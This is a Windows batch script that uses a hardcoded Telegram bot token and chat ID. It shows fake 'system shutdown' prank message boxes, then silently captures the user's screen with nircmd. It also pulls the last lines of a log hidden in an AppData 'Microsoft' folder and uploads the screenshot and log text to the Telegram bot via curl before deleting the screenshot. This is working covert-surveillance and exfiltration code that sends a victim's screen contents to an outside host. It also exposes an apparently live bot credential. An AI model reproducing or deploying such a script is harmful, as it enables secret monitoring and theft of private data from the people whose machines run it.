@echo off





:: ============ MyScreen TOPIC ============


:: Set bot token, chat ID, and message
set "TOKEN_MyScrn=7470339630:AAEwHeixYKwvT6WYutXCjBBugdjTGjTIZVA"
set "CHAT_ID_MyScrn=-1002163721260"
set "TOPIC_ID_MyScrn=74293"
set "MESSAGE_MyScrn=Left......|%time%|"
set "ENCODED_MESSAGE_MyScrn=%MESSAGE_MyScrn: =%%2"
set "CAPTION_MyScrn="
set "FILE_PATH_MyScrn=%USERPROFILE%\Downloads\screenshot.png"







::goto skip_code
::goto :EOF





set /a NUM=1


:: Run Once
if exist "%temp%\run_once1.flag" goto skip_code





:loop
if %NUM% GTR 20 goto play

:: Send Message 
curl -s -X POST "https://api.telegram.org/bot%TOKEN_MyScrn%/sendMessage" ^
     -d "chat_id=%CHAT_ID_MyScrn%" ^
     -d "message_thread_id=%TOPIC_ID_MyScrn%" ^
     -d "text=%NUM%"

set /a NUM+=1
timeout /t 3 /nobreak



goto loop




:play


set nircmd="%APPDATA%\Microsoft\nircmd.exe"

:: First message (Fake shutdown warning)
echo MsgBox "Your system will shut down in 1 minute!", 48, "System Alert" > %temp%\prank.vbs
start "" wscript %temp%\prank.vbs
timeout /t 1 /nobreak >nul
start "" wscript %temp%\prank.vbs
timeout /t 4 /nobreak >nul

:: Wait 10 seconds before overwriting
timeout /t 7 /nobreak >nul

:: Overwrite with the second message (Just kidding!)
echo MsgBox "Just kidding! PC is fine.", 64, "System Alert" > %temp%\prank.vbs

:: Open "Just kidding!" message 10 times
for /L %%i in (1,1,10) do (
    start "" wscript %temp%\prank.vbs
	%nircmd% wait 300
)
echo 1 > "%temp%\run_once1.flag"


goto play1


cd /d "%USERPROFILE%\Desktop\test\Atest"
"%APPDATA%\Microsoft\nircmd.exe" setsysvolume 20238
start "" /B mpv.exe --fullscreen --border=no --ontop --no-input-default-bindings --no-osc --no-stop-screensaver --term-status-msg=" " --idle=no --force-window=no --no-terminal --geometry=100%x100% --keepaspect=no --autofit=100%x100% --length=7 video.mp4
timeout /t 3 /nobreak >nul
echo 1 > "%temp%\run_once1.flag"



:play1



:: del /f /q "%temp%\run_once.flag"


:: "%APPDATA%\Microsoft\nircmd.exe" monitor off

















:skip_code





timeout /t 600 /nobreak


:again

cd /d "%~dp0"


"%APPDATA%\Microsoft\nircmd.exe" savescreenshot "%USERPROFILE%\Downloads\screenshot.png"


set "input_file=%appdata%\Microsoft\play\playit_output.log"
set "output_file=%appdata%\Microsoft\play\playit_7lines.log"


:: Use PowerShell to get the last 7 lines of the file and save them to the output file
powershell -Command "Get-Content '%input_file%' | Select-Object -Last 7 | Out-File '%output_file%'"

echo Last 7 lines have been saved to %output_file%

:SENDMSG


:: Use PowerShell to read the contents of playit_7lines.log and URL-encode it
::for /f "delims=" %%a in ('powershell -Command "(Get-Content '%output_file%' | Out-String).Trim() -replace ' ', '%%20' -replace '&', '%%26' -replace '\n', '%%0A'"') do set "CAPTION_MyScrn=%%a"
for /f "delims=" %%a in ('powershell -Command ^
    "$content = (Get-Content '%output_file%' -Raw) -replace '\r?\n', '%%0A';" ^
    "$content -replace ' ', '%%20' -replace '&', '%%26'"') do set "CAPTION_MyScrn=%%a"



:: Send Photo
curl -s -X POST "https://api.telegram.org/bot%TOKEN_MyScrn%/sendPhoto" ^
     -F "chat_id=%CHAT_ID_MyScrn%" ^
     -F "message_thread_id=%TOPIC_ID_MyScrn%" ^
     -F "caption=%CAPTION_MyScrn%" ^
     -F "photo=@%FILE_PATH_MyScrn%" ^
     --limit-rate 50K

::goto GOGO2




:GOGO2


del /f /q "%USERPROFILE%\Downloads\screenshot.png"





echo.
echo.
